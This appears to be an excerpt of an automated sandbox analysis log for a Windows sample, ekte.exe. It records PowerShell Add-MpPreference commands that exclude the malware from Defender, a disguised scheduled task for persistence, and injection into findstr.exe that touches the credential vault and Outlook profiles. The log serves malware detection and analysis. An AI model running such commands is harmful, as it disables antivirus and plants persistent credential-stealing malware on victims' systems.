            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................%P.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................1P.........................s............H...............................
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................@........E......................................................................Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....................@........E..............................................j.......................Jump to behavior
            Source: ekte.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ekte.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\ekte.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: ekte.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\ekte.exeFile read: C:\Users\user\Desktop\ekte.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
            Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\ekte.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ekte.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ekte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
